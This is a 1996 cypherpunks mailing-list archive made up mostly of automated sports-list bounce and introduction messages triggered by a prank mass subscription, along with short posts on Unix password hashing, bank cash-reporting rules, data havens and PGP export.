We ask that all users read this document and look at the charter for
what is acceptable use of this mailing list. We also ask that if you
haven't done so, send e-mail to <manners@plaidworks.com>. That file
contains the general rules we administer this list under, as well as
hints that we've found help people write e-mail messages which are
easier to understand and help the mailing lists function smoothly.

Everyone using these lists is expected to abide by the rules in these
files. We don't consider ignorance of the rules an excuse for
unacceptable behavior. Please work with us to make this a fun,
interesting and educational place to be. 
+++IMPORTANT+++

Administrative messages sent to the mailing lists will have a subject
that begins with "Admin:". Please read these messages, as they have
important information about the state of the lists and systems and
changes that might affect how you use it.

If you want to find out what else is available on this server, browse
<http://www.plaidworks.com/ListAdmin/> or send e-mail to
<info@plaidworks.com>. It will return a document listing all of our
services.

We have written a tutorial on using the listproc mail server. You can
get a copy of that by sending e-mail to
<listproc-help@plaidworks.com>.

============
Table of Contents
============
1) The Oakland Athletics Mailing List
2) Who to contact for help and advice
3) Subscription Info: Important Mail Server Commands
4) Sending Messages to the mailing lists
5) Charter: What's Acceptable/What's not
6) How to find the World Wide Web Home Page, Frequently Asked Questions
	(FAQ), and FTP archives

============
1) The Oakland Athletics Mailing Lists
============

The "Oakland Athletics" mailing list is for general discussion of
issues and topics pertaining to the baseball team, it's farm system,
the organization, and other related things.

We are not affiliated with the Oakland Athletics in any way.

Please see the charters below for detailed descriptions of what is and
is not acceptable material for these lists.

There are other mailing lists available as well. Please send e-mail to
<info@plaidworks.com> to get a listing of their names, topics, and
subscription information.

============
2) Who to contact for help and advice
============
The List Mom (or Sysops) for these lists are:

    Chuq Von Rospach (e-mail: <chuqui@plaidworks.com>)

    Mailing List problems: <postmaster@plaidworks.com>

Please try to follow the directions. If you can't make things work,
drop us a note and we'll be happy to help. Try us second, though: we're
your helpers, not your baby-sitters. The time we spend doing
administrative things is time we can't spend creating better services
for you.

============
3) Subscription Info: Important Mail Server commands
============

To subscribe or unsubscribe to a mailing list, you should use the WWW
subscription site at <http://www.plaidworks.com/ListAdmin/>. If you
don't have WWW access (get it!), you must send an e-mail command to the
address <listproc@plaidworks.com>. Leave the subject line blank or put
a nonsense word in it -- do not put Listproc commands in the subject,
or Listproc will reject the message.  For complete details on using
listproc, get the listproc tutorial mentioned above.

Here are the listproc commands to subscribe to these mailing lists:
    SUBSCRIBE oak-athletics your real name goes here

Here are the commands to unsubscribe from these mailing lists:
    UNSUBSCRIBE oak-athletics

If you want to switch a list to digest mode, use these commands:
    SET oak-athletics MAIL DIGEST

If you want to switch a list from digest mode, use these commands:
    SET oak-athletics MAIL ACK

Remember, all listproc commands go to <listproc@plaidworks.com>, not
the main mailing list.

You can put more than one command in an e-mail message. Please note
that if your e-mail messages contain signatures, listproc will attempt
to read them as commands and return an error to you. This can be
ignored if you also get the confirmation back on the earlier commands.
You should get a confirmation e-mail or error warning for EVERY command
you send to listproc. If you didn't, something went wrong. Try it
again, and if it still doesn't work, contact <postmaster@plaidworks.com>
for help.

============
4) Sending messages to the mailing lists
============
To post to the mailing lists, send mail to the appropriate list address:
    <oak-athletics@plaidworks.com>

You must be a subscriber to the list to post to it. Listproc (the mail
server we use) is very picky about your address: it will not recognize
you as a subscriber except from the account where you sent the
SUBSCRIBE command from.

============
5) Charter: What's Acceptable, What's Not
============

There is a file of general rules and guidelines that we ask users to
abide by on these mailing lists. If you haven't done so send e-mail to
<manners@plaidworks.com> to get this list and please read it. We don't
consider ignorance of the rules an excuse for unacceptable behavior.
Please work with us to make this a fun, interesting and educational
place to be.

The "Oakland Athletics" mailing list is for general discussion of
issues and topics pertaining to the baseball team, it's farm system,
the organization, and other related things.

+++ Acceptable uses:

1) Information about the Oakland Athletics baseball club, it's minor
league farm system, management, and organization.

2) S.F. Oakland Athletics Collectibles and Merchandise information.
Please don't try to buy or sell stuff on the list, though. It's not a
classified ad or a swap meet.

3) Schedule information, box scores, team status, and transaction
reports.

4) Road Trips and group get-togethers. A way for out-of-towners to find
out what's happening when they visit, and for the locals to meet their
like-minded on-line fans.

5) Tickets for sale (and wanted). Scalping is not allowed, however.
Please see the note on this in the manners@plaidworks.com document.

6) Anything else of interest about the Oakland Athletics.

The oak-athletics list should be used for things specific to the
Oakland Athletics, primarily on-field issues. Anything that shifts away
from that towards more general baseball discussions or any
organizational discussions that don't involve the team specifically
should be put on baseball-chat.

One thing these lists are NOT for: this is not a place for the
discussion of rotisserie or fantasy baseball. Please do not come in
here looking for data on players you've drafted for a roto league, but
otherwise have no clue who they are. There are plenty of places for
that. This is for people who enjoy baseball as baseball.

Think of this as a sports bar, where we can all sit down with a drink
of our choice and discuss the game of our choice. Those who become too
rowdy, too drunk, too obnoxious or abusive will be shown the door.
Everyone else is welcome -- so drink in moderation, and act like an
adult. That's all we ask.

============
6) How to find the Home Page, Frequently Asked Questions (FAQ)
============
This document is:
    <ftp://plaidworks.com/list-archives/oak-athletics/oak-athletics.INTRO>

If you aren't sure how to access the World Wide Web or FTP from your
site, please ask your local administrators for advice, since it varies
for different organizations and types of computers. If you can't get
help locally, drop private e-mail to one of the List Moms, and we'll do
what we can do to get you started.

The FTP archive is in the directory <~ftp/list-archives/oak-athletics/>.

All messages to the list are archived in the "message.archives" folder
in the subdirectory with the same name as the list you're looking for.
If you have WWW access, there will be a searchable database of the
message real soon now.

---- end of oak-athletics.INTRO ----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharks-tickets@plaidworks.com
Date: Thu, 26 Dec 1996 11:13:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Error Condition Re:
Message-ID: <199612261911.LAA28032@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain



The mail server has identified an administrative command in your
message. DO NOT SEND ADMINISTRATIVE COMMANDS TO THE LIST. All server
commands should be sent to listproc@plaidworks.com.

If you did not intend to send an administrative command, then you'll need
to rewrite your message to avoid the command words

	 UNSUBSCRIBE

that are causing listproc to trap your message.

For help, send email to address info@plaidworks.com

-------------------------------------------------------------------------------
unsubscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharks-chat@plaidworks.com
Date: Thu, 26 Dec 1996 11:13:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Error Condition Re:
Message-ID: <199612261910.LAA28019@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain



The mail server has identified an administrative command in your
message. DO NOT SEND ADMINISTRATIVE COMMANDS TO THE LIST. All server
commands should be sent to listproc@plaidworks.com.

If you did not intend to send an administrative command, then you'll need
to rewrite your message to avoid the command words

	 UNSUBSCRIBE

that are causing listproc to trap your message.

For help, send email to address info@plaidworks.com

-------------------------------------------------------------------------------
unsubscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@plaidworks.com
Date: Thu, 26 Dec 1996 11:25:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: the file you requested
Message-ID: <199612261926.LAA28478@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 
Introduction to the Sharks Mailing Lists
Version 2.0

Last update August 25, 1996

This file is available at any time by e-mailing to
    <sharks-request@plaidworks.com> or by FTP as
    <ftp://plaidworks.com/hockey/nhl/sharks/sharks.INTRO>

+++IMPORTANT+++
We ask that all users read this document and look at the charter for
what is acceptable use of this mailing list. We also ask that if you
haven't done so, send e-mail to <manners@plaidworks.com>. That file
contains the general rules we administer this list under, as well as
hints that we've found help people write e-mail messages which are
easier to understand and help the mailing lists function smoothly.

Everyone using these lists is expected to abide by the rules in these
files. We don't consider ignorance of the rules an excuse for
unacceptable behavior. Please work with us to make this a fun,
interesting and educational place to be. 
+++IMPORTANT+++

Administrative messages sent to the mailing lists will have a subject
that begins with "Admin:". Please read these messages, as they have
important information about the state of the lists and systems and
changes that might affect how you use it.

If you want to find out what else is available on this server, send
e-mail to <info@plaidworks.com>. It will return a document listing all
of our services.

We have written a tutorial on using the listproc mail server. You can
get a copy of that by sending e-mail to
<listproc-help@plaidworks.com>.

============
Table of Contents
============
1) The Sharks Family of Mailing Lists
2) Who to contact for help and advice
3) Subscription Info: Important Mail Server Commands
4) Sending Messages to the mailing lists
5) Charter: What's Acceptable/What's not
6) How to find the World Wide Web Home Page, Frequently Asked Questions
	(FAQ), and FTP archives

============
1) The Sharks Family of Lists
============
The following sharks-related lists are available on plaidworks.com:

sharks: This list is for discussion of on-ice related things ONLY.
    Players, games, that sort of thing. It should relate to the game of
    hockey and the San Jose Sharks in some way, or it belongs on one of
    the other lists.

sharks-chat: This list is for discussion of the off-ice related aspects
    of the Sharks: arena, organizational issues, complaints about
    ticket prices or the cost of beer. Anything having to do with the
    San Jose Sharks club OTHER than the team itself and what they do
    goes here.

    In general, if it is about the TEAM, put it in Sharks. If it is
    about the organization, put it in Sharks-Chat. If you aren't sure,
    put it in Sharks-Chat or ask one of the List Moms for advice.

sharks-tickets: For the sale and purchase of tickets to Sharks games by
    the users of our mailing list. No dealers or brokers, and sales
    during the regular season must be at no more than face value.

Please see the charters below for detailed descriptions of what is and
is not acceptable material for these lists.

There are other mailing lists available as well. Please send e-mail to
<info@plaidworks.com> to get a listing of their names, topics, and
subscription information.

============
2) Who to contact for help and advice
============
The List Moms (or Sysops) for these lists are:

    Chuq Von Rospach (e-mail: <chuqui@plaidworks.com>)
    Laurie Sefton (e-mail: <lsefton@plaidworks.com>)

    Mailing List problems: <server@plaidworks.com>

Please try to follow the directions. If you can't make things work,
drop us a note and we'll be happy to help. Try us second, though: we're
your helpers, not your baby-sitters. The time we spend doing
administrative things is time we can't spend creating better services
for you.

============
3) Subscription Info: Important Mail Server commands
============

To subscribe or unsubscribe to a mailing list, you must send an e-mail
command to the address <listproc@plaidworks.com>. Leave the subject
line blank or put a nonsense word in it -- do not put Listproc commands
in the subject, or Listproc will reject the message.  For complete
details on using listproc, get the listproc tutorial mentioned above.

Here are the listproc commands to subscribe to these mailing lists:
    SUBSCRIBE sharks your real name goes here
    SUBSCRIBE sharks-chat your real name goes here
    SUBSCRIBE sharks-tickets your real name goes here

Here are the commands to unsubscribe from these mailing lists:
    UNSUBSCRIBE sharks
    UNSUBSCRIBE sharks-chat
    UNSUBSCRIBE sharks-tickets

If you want to switch a list to digest mode, use these commands:
    SET sharks MAIL DIGEST
    SET sharks-chat MAIL DIGEST
    SET sharks-tickets MAIL DIGEST

If you want to switch a list from digest mode, use these commands:
    SET sharks MAIL ACK
    SET sharks-chat MAIL ACK
    SET sharks-tickets MAIL ACK

Remember, all listproc commands go to <listproc@plaidworks.com>, not
the main mailing list.

You can put more than one command in an e-mail message. Please note
that if your e-mail messages contain signatures, listproc will attempt
to read them as commands and return an error to you. This can be
ignored if you also get the confirmation back on the earlier commands.
You should get a confirmation e-mail or error warning for EVERY command
you send to listproc. If you didn't, something went wrong. Try it
again, and if it still doesn't work, contact <server@plaidworks.com>
for help.

============
4) Sending messages to the mailing lists
============
To post to the mailing lists, send mail to the appropriate list address:
    <sharks@plaidworks.com>
    <sharks-chat@plaidworks.com>
    <sharks-tickets@plaidworks.com>

You must be a subscriber to the list to post to it. Listproc (the mail
server we use) is very picky about your address: it will not recognize
you as a subscriber except from the account where you sent the
SUBSCRIBE command from.

============
5) Charter: What's Acceptable, What's Not
============
There is a file of general rules and guidelines that we ask users to
abide by on these mailing lists. If you haven't done so send e-mail to
<manners@plaidworks.com> to get this list and please read it. We don't
consider ignorance of the rules an excuse for unacceptable behavior.
Please work with us to make this a fun, interesting and educational
place to be.

Sharks: This list is for discussion of on-ice related things ONLY.
    Players, games, that sort of thing. It should relate to the game of
    hockey and the San Jose Sharks in some way, or it belongs on one of
    the other lists.

Sharks-Chat: This list is for discussion of the off-ice related aspects
    of the Sharks: arena, organizational issues, complaints about
    ticket prices or the cost of beer. Anything having to do with the
    San Jose Sharks club OTHER than the team itself and what they do
    goes here.

    In general, if it is about the TEAM, put it in Sharks. If it is
    about the organization, put it in Sharks-Chat. If you aren't sure,
    put it in Sharks-Chat or ask one of the List Moms for advice.

Sharks-Tickets: the place to buy and sell tickets. Please do not put
    ticket requests on any of the other lists. The groundrules: no
    commercial services may use the list. Tickets may be sold ONLY for
    face value.  There is no scalping on the list. Period. For the
    playoffs, we relax this rule in the following way: tickets may be
    sold but prices may not be listed in the messages. Keep the
    transaction private. Anyone found violating this, or found selling
    tickets above face value during the regular season, may be kicked
    off the list permanently. This is a service to our readers, not a
    source of income.

============
6) How to find the Home Page, Frequently Asked Questions (FAQ)
============
The World Wide Web home page for these mailing lists is:
    <http://hockey.plaidworks.com/sharks/>

The World Wide Web pages are all written and maintained by Mike Lamar
<mlamar@plaidworks.com>. If you have questions or comments on them, please
contact Mike.

This document is:
    <ftp://plaidworks.com/hockey/nhl/sharks/sharks.INTRO>

If you aren't sure how to access the World Wide Web or FTP from your
site, please ask your local administrators for advice, since it varies
for different organizations and types of computers. If you can't get
help locally, drop private e-mail to one of the List Moms, and we'll do
what we can do to get you started.

The FTP archive is in the directory <~ftp/hockey/nhl/sharks/>.

All messages to the list are archived in the "message.archives" folder
in the subdirectory with the same name as the list you're looking for.
If you have WWW access, there will be a searchable database of the
message real soon now.

If you have no access via FTP, these files can be accessed through
listproc. e-mail <listproc-help@plaidworks.com> for instructions. Note
that because this is a very lightly used function and time intensive
for the List Mom, it's rarely up to date. Consider it a last resort.

---- end of sharks.INTRO ----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@plaidworks.com
Date: Thu, 26 Dec 1996 11:27:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: the file you requested
Message-ID: <199612261928.LAA28498@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 
Introduction to the Sharks Mailing Lists
Version 2.0

Last update August 25, 1996

This file is available at any time by e-mailing to
    <sharks-request@plaidworks.com> or by FTP as
    <ftp://plaidworks.com/hockey/nhl/sharks/sharks.INTRO>

+++IMPORTANT+++
We ask that all users read this document and look at the charter for
what is acceptable use of this mailing list. We also ask that if you
haven't done so, send e-mail to <manners@plaidworks.com>. That file
contains the general rules we administer this list under, as well as
hints that we've found help people write e-mail messages which are
easier to understand and help the mailing lists function smoothly.

Everyone using these lists is expected to abide by the rules in these
files. We don't consider ignorance of the rules an excuse for
unacceptable behavior. Please work with us to make this a fun,
interesting and educational place to be. 
+++IMPORTANT+++

Administrative messages sent to the mailing lists will have a subject
that begins with "Admin:". Please read these messages, as they have
important information about the state of the lists and systems and
changes that might affect how you use it.

If you want to find out what else is available on this server, send
e-mail to <info@plaidworks.com>. It will return a document listing all
of our services.

We have written a tutorial on using the listproc mail server. You can
get a copy of that by sending e-mail to
<listproc-help@plaidworks.com>.

============
Table of Contents
============
1) The Sharks Family of Mailing Lists
2) Who to contact for help and advice
3) Subscription Info: Important Mail Server Commands
4) Sending Messages to the mailing lists
5) Charter: What's Acceptable/What's not
6) How to find the World Wide Web Home Page, Frequently Asked Questions
	(FAQ), and FTP archives

============
1) The Sharks Family of Lists
============
The following sharks-related lists are available on plaidworks.com:

sharks: This list is for discussion of on-ice related things ONLY.
    Players, games, that sort of thing. It should relate to the game of
    hockey and the San Jose Sharks in some way, or it belongs on one of
    the other lists.

sharks-chat: This list is for discussion of the off-ice related aspects
    of the Sharks: arena, organizational issues, complaints about
    ticket prices or the cost of beer. Anything having to do with the
    San Jose Sharks club OTHER than the team itself and what they do
    goes here.

    In general, if it is about the TEAM, put it in Sharks. If it is
    about the organization, put it in Sharks-Chat. If you aren't sure,
    put it in Sharks-Chat or ask one of the List Moms for advice.

sharks-tickets: For the sale and purchase of tickets to Sharks games by
    the users of our mailing list. No dealers or brokers, and sales
    during the regular season must be at no more than face value.

Please see the charters below for detailed descriptions of what is and
is not acceptable material for these lists.

There are other mailing lists available as well. Please send e-mail to
<info@plaidworks.com> to get a listing of their names, topics, and
subscription information.

============
2) Who to contact for help and advice
============
The List Moms (or Sysops) for these lists are:

    Chuq Von Rospach (e-mail: <chuqui@plaidworks.com>)
    Laurie Sefton (e-mail: <lsefton@plaidworks.com>)

    Mailing List problems: <server@plaidworks.com>

Please try to follow the directions. If you can't make things work,
drop us a note and we'll be happy to help. Try us second, though: we're
your helpers, not your baby-sitters. The time we spend doing
administrative things is time we can't spend creating better services
for you.

============
3) Subscription Info: Important Mail Server commands
============

To subscribe or unsubscribe to a mailing list, you must send an e-mail
command to the address <listproc@plaidworks.com>. Leave the subject
line blank or put a nonsense word in it -- do not put Listproc commands
in the subject, or Listproc will reject the message.  For complete
details on using listproc, get the listproc tutorial mentioned above.

Here are the listproc commands to subscribe to these mailing lists:
    SUBSCRIBE sharks your real name goes here
    SUBSCRIBE sharks-chat your real name goes here
    SUBSCRIBE sharks-tickets your real name goes here

Here are the commands to unsubscribe from these mailing lists:
    UNSUBSCRIBE sharks
    UNSUBSCRIBE sharks-chat
    UNSUBSCRIBE sharks-tickets

If you want to switch a list to digest mode, use these commands:
    SET sharks MAIL DIGEST
    SET sharks-chat MAIL DIGEST
    SET sharks-tickets MAIL DIGEST

If you want to switch a list from digest mode, use these commands:
    SET sharks MAIL ACK
    SET sharks-chat MAIL ACK
    SET sharks-tickets MAIL ACK

Remember, all listproc commands go to <listproc@plaidworks.com>, not
the main mailing list.

You can put more than one command in an e-mail message. Please note
that if your e-mail messages contain signatures, listproc will attempt
to read them as commands and return an error to you. This can be
ignored if you also get the confirmation back on the earlier commands.
You should get a confirmation e-mail or error warning for EVERY command
you send to listproc. If you didn't, something went wrong. Try it
again, and if it still doesn't work, contact <server@plaidworks.com>
for help.

============
4) Sending messages to the mailing lists
============
To post to the mailing lists, send mail to the appropriate list address:
    <sharks@plaidworks.com>
    <sharks-chat@plaidworks.com>
    <sharks-tickets@plaidworks.com>

You must be a subscriber to the list to post to it. Listproc (the mail
server we use) is very picky about your address: it will not recognize
you as a subscriber except from the account where you sent the
SUBSCRIBE command from.

============
5) Charter: What's Acceptable, What's Not
============
There is a file of general rules and guidelines that we ask users to
abide by on these mailing lists. If you haven't done so send e-mail to
<manners@plaidworks.com> to get this list and please read it. We don't
consider ignorance of the rules an excuse for unacceptable behavior.
Please work with us to make this a fun, interesting and educational
place to be.

Sharks: This list is for discussion of on-ice related things ONLY.
    Players, games, that sort of thing. It should relate to the game of
    hockey and the San Jose Sharks in some way, or it belongs on one of
    the other lists.

Sharks-Chat: This list is for discussion of the off-ice related aspects
    of the Sharks: arena, organizational issues, complaints about
    ticket prices or the cost of beer. Anything having to do with the
    San Jose Sharks club OTHER than the team itself and what they do
    goes here.

    In general, if it is about the TEAM, put it in Sharks. If it is
    about the organization, put it in Sharks-Chat. If you aren't sure,
    put it in Sharks-Chat or ask one of the List Moms for advice.

Sharks-Tickets: the place to buy and sell tickets. Please do not put
    ticket requests on any of the other lists. The groundrules: no
    commercial services may use the list. Tickets may be sold ONLY for
    face value.  There is no scalping on the list. Period. For the
    playoffs, we relax this rule in the following way: tickets may be
    sold but prices may not be listed in the messages. Keep the
    transaction private. Anyone found violating this, or found selling
    tickets above face value during the regular season, may be kicked
    off the list permanently. This is a service to our readers, not a
    source of income.

============
6) How to find the Home Page, Frequently Asked Questions (FAQ)
============
The World Wide Web home page for these mailing lists is:
    <http://hockey.plaidworks.com/sharks/>

The World Wide Web pages are all written and maintained by Mike Lamar
<mlamar@plaidworks.com>. If you have questions or comments on them, please
contact Mike.

This document is:
    <ftp://plaidworks.com/hockey/nhl/sharks/sharks.INTRO>

If you aren't sure how to access the World Wide Web or FTP from your
site, please ask your local administrators for advice, since it varies
for different organizations and types of computers. If you can't get
help locally, drop private e-mail to one of the List Moms, and we'll do
what we can do to get you started.

The FTP archive is in the directory <~ftp/hockey/nhl/sharks/>.

All messages to the list are archived in the "message.archives" folder
in the subdirectory with the same name as the list you're looking for.
If you have WWW access, there will be a searchable database of the
message real soon now.

If you have no access via FTP, these files can be accessed through
listproc. e-mail <listproc-help@plaidworks.com> for instructions. Note
that because this is a very lightly used function and time intensive
for the List Mom, it's rarely up to date. Consider it a last resort.

---- end of sharks.INTRO ----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listproc@plaidworks.com
Date: Thu, 26 Dec 1996 11:42:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Error Condition Re: Invalid request
Message-ID: <199612261942.LAA28764@plaidworks.com>
MIME-Version: 1.0
Content-Type: text/plain




===============
Mail Daemon Command Error
===============

The line that caused the error was:

>UNSUBSCRIBE BASEBALL-CHAT SATAN 

CYPHERPUNKS@TOAD.COM: You are not subscribed to baseball-chat@plaidworks.com

====================

For more help, send e-mail to
	<info@plaidworks.com>
or browse
	<http://www.plaidworks.com/ListAdmin/> to use
our new World Wide Web interface.
====================

Any list commands after the point of error are ignored.

If you put a 'signature' on your email, that will cause an
error. This can be ignored if you received confirmation of
your other commands.



==========
Mail Daemon Command Summary
==========

The syntax for the most common commands is:
(if you aren't sure, get help from the above help sources)

	SUBSCRIBE listname your name goes here

	UNSUBSCRIBE listname

To turn on DIGEST mode, use:
	SET listname MAIL DIGEST

To turn off DIGEST mode, use:
	SET listname MAIL ACK



==========
If you need more help
==========

If you can't make it work, send e-mail to <postmaster@plaidworks.com>
and we'll help you out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 26 Dec 1996 11:50:28 -0800 (PST)
To: listproc@plaidworks.com
Subject: Re: WHICH
In-Reply-To: <199612261909.LAA27991@plaidworks.com>
Message-ID: <199612261949.LAA07264@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


listproc@plaidworks.com writes:
> 
> cypherpunks@toad.com: You are subscribed to the following lists;
> if none appear, you are not subscribed to any:
> MINORS
> MINORS-SCORES
> IHL
> BAY-AREA-HOCKEY
> ROLLER-HOCKEY-INTL
> WOMEN-IN-HOCKEY
> GIANTS
> GIANTS-TICKETS
> BASEBALL-CHAT
> SHARKS
> SHARKS-TICKETS
> SHARKS-CHAT
> HOCKEY-CHAT
> DALLAS-STARS
> LA-KINGS
> ONLINE-DRIVE
> PIT-PENGUINS
> MAPLE-LEAFS
> OTT-SENATORS
> PHX-COYOTES
> BHAWKS-L
> COL-AVALANCHE
> HOCKEY-COACHES
> HOCKEY-REFEREES
> CAL-FLAMES
> OAK-ATHLETICS
> HOCKEY-PLAYERS


I've submitted a request to unsubscribe cypherpunks from these lists.
I have also notified the operator of plaidworks.com of the problem.

While I think that his web-based list-subscription tools is neat, it's
obvious that the potential for abuse is large.  What solutions are there
for protecting us from assholes like the one who signed cypherpunks
up to all these lists?

Maybe soon all lists will require some form of digital ID from new
subscribers?

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 26 Dec 1996 11:52:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Unix Passwd (fwd)
Message-ID: <199612261952.LAA07314@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Laszlo Vecsey writes:
> On Thu, 26 Dec 1996, Eric Murray wrote:
> 
> > Fyodor Yarochkin writes:
> > > 
> > > 
> > > Anyone has any success in breaking this?
> > > -f
> > 
> > Many people have tried breaking the cipher, I have not heard
> > of anyone being successful.
> > 
> > There is however a number of programs that attempt a brute-force
> > of passwords, the best is called 'crack' and is written by Alec Muffet.
> 
> >From Applied Cryptography (2nd edition) I got the impression that it has
> been cracked. Do a netsearch for "Crypt Breakers Workbench", its a
> freeware program that attempts to do just that.

Different crypt.  That's crypt(1), a modification of the Enigma
algorithim.  UNIX passwords use crypt(3), a modified DES.

Yea, the names are confusing.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Topalovich <TOPALOVICH@terraglyph.com>
Date: Thu, 26 Dec 1996 10:03:17 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Legality of requiring credit cards?
Message-ID: <c=US%a=_%l=TGIEXCH-961226180536Z-2523@TGIEXCH.terraglyph.com>
MIME-Version: 1.0
Content-Type: text/plain




>True.  But when I was a wetback bank teller making $6.50 an hour, I didn't
>fill out any forms I didn't have to.  Come to think of it, you have to fill
>out a CTR when you purchase a bank check or money order for only $3,000 or
>more in cash.  I forgot about that.
>
>Just a side note to show how effective these CTRs have to be...when I worked
>at a bank many moons ago, we would receive calls from the IRS pertaining to
>CTRs that we had filled out 8 or 9 months before...I would find that very
>encouraging if I were laundering money on a temporary basis.  You get the
>money moved, skip town, and you still have a good 6 month head start before
>the IRS even has a notion to catch on.
>
>Mike
>
>----------
>From: 	dlv@bwalk.dm.com[SMTP:dlv@bwalk.dm.com]
>Sent: 	Tuesday, December 24, 1996 12:41 PM
>To: 	cypherpunks@toad.com
>Subject: 	RE: Legality of requiring credit cards?
>
>Mike Topalovich <TOPALOVICH@terraglyph.com> writes:
>> It's not necessarily because you are paying with $100 bills.  The IRS
>> requires banks and other businesses to report all cash transactions
>> exceeding $10,000 by means of a Currency Transaction Report (CTR).  This
>> is a way for the IRS to track money laundering.  There happens to be two
>> lines on the form asking for the number of $50 and $100 bills, but those
>> lines are optional.
>
>They're supposed to report "suspicious" cash transactions under 10K too.
>
>---
>
>Dr.Dimitri Vulis KOTM
>Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Topalovich <TOPALOVICH@terraglyph.com>
Date: Thu, 26 Dec 1996 10:04:14 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Legality of requiring credit cards?
Message-ID: <c=US%a=_%l=TGIEXCH-961226180632Z-2524@TGIEXCH.terraglyph.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>This isn't to start any arguments, it's just an FYI...I noticed that when I
>worked for a bank, many banks would only allow other banks to call to verify
>funds.  What this meant was, I'd have customers calling me who in turn had
>customers who were growing *very* impatient because they had written a
>personal check, who had to wait for the clerk to call to verify funds, spend
>10 minutes on hold for bookkeeping only to find that the bank they were
>calling only allows other banks to verify funds, who then had to wait for the
>clerk to call the company's bank to call the other bank to sit on hold
>another 10 minutes for bookkeeping only to have the bookkeeper try to weasel
>his/her way out of doing any work by disputing the fact that you worked for a
>bank, blah, blah, blah.
>
>What's the point?  Maybe some of us don't want to have to go into debt just
>to buy groceries, and don't want to carry buttloads of cash on us all of the
>time.  With banks charging ridiculous fees to keep *your* money in a checking
>account, where's the big incentive?
>
>I say we go back to a barter system
>
>Mike
>
>
>----------
>From: 	gimonca@skypoint.com[SMTP:gimonca@skypoint.com]
>Sent: 	Wednesday, December 25, 1996 12:57 AM
>To: 	cypherpunks@toad.com
>Subject: 	Re: Legality of requiring credit cards? (fwd)
>
>People on the list could probably come up with much better ways to
>authenticate a reputation. Until then, for personal checks, you can
>call any bank in the U.S., ask for bookkeeping, and ask them if there
>are funds in the bank to cover the check you're holding. Any bank
>should give you a yes or no on this. Some banks, like the First Banks
>here in Minnesota, will do this through their automated telephone
>banking services, 24 hours.
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 26 Dec 1996 09:19:36 -0800 (PST)
To: pandemic@hotmail.com>
Subject: Re: Distributed data havens?
In-Reply-To: <32C1D34A.B13@hotmail.com>
Message-ID: <Pine.LNX.3.95.961226121755.244A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 26 Dec 1996, some days weren't there at all wrote:

> Is anything new on the distributed data haven front? Many apologies if
> I'm retreading scorched earth, but I've been out of touch with the world
> for the past, oh, twelve weeks. In particular, it would be interesting
> to know if

Ross Anderson's "Eternity Service" paper is about distributed data havens.
It's available at ftp.cl.cam.ac.uk/users/rja14/eternity.ps.Z .

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMsK0eCzIPc7jvyFpAQHi4QgAiWU82sHUj5GqnFFtVdgd7gYF9u5QMsKU
Ru0+WA94KNBryDYhLVEeTXE1IPKsdyIpG+oKIfyfcmoFqpLayuaRf1IztS0SBSBg
mvW5waCG8/9XrWogfm+duOBy9KAl1BUInihrUEyn4ZnSpi7RfnK8UgcfwRQNEWeV
eYxnBQT6dBTvoZiW3FLFDLVyjrkr2bJ8SloifCFZn4Mov1iXaJihp991jcnq3ERq
BEMhIwtkQgzaFwbdK6Cax4hKC/eWkiMYLG2B/ixQDcXsoxVykpYOfneEBXIJz2r1
181Z+BKSPmKR66UtMxBZUoj5VkEKS37YLHB9XanUbFV/O8e+OmjKNA==
=w7tt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 31 Dec 1996 11:24:04 -0800 (PST)
To: dthorn@gte.net
Subject: Re: "Structuring" of Communications a Felony?
In-Reply-To: <32C7EE6C.72D1@gte.net>
Message-ID: <199612261239.MAA00376@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



> So how would the courts prosecute if me and (n) number of other
> persons distribute separate pieces of a "binary", i.e., encrypted or
> otherwise?

You could always try it out, and find out :-)  Take a look at:

	http://www.dcs.ex.ac.uk/~aba/export/

several people have used this .sig in the past.  (Returns you the next
3 lines of uuencoded PGP.EXE, sample below).  Perhaps future
